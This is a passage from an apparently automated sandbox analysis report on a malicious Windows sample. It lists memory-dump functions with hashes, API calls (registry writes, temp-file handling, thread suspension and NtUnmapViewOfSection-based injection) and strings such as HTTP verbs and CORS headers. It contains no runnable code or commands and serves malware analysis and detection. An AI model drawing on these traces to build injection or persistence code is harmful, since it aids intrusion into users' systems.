    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5B7B, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 25memory
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE6E9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123 Total matches: 37
Similarity
  • Total matches: 37
  • API ID: GetLastErrorGetVersion
  • String ID: GET$POST
  • API String ID: 2325875326-3192705859
  • Opcode ID: 26b0fd4c2e62fc57389cc46e4c3039c84c7b440f69484f47d42f00f4ba49821f
  • Instruction ID: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
  • Opcode Fuzzy Hash: BC014CB305DC52EBD17BB6950006FB39B84DF12AF6CDC611079816A3DCBE8072355B40
  • Instruction Fuzzy Hash: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
APIs
    • Part of subcall function 001D9640: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,001DE6F9,00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000), ref: 001D9649
    • Part of subcall function 001D9640: mbstowcs.NTDLL ref: 001D9670
    • Part of subcall function 001D9640: memset.NTDLL ref: 001D9682
  • GetVersion.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE705
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE834
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
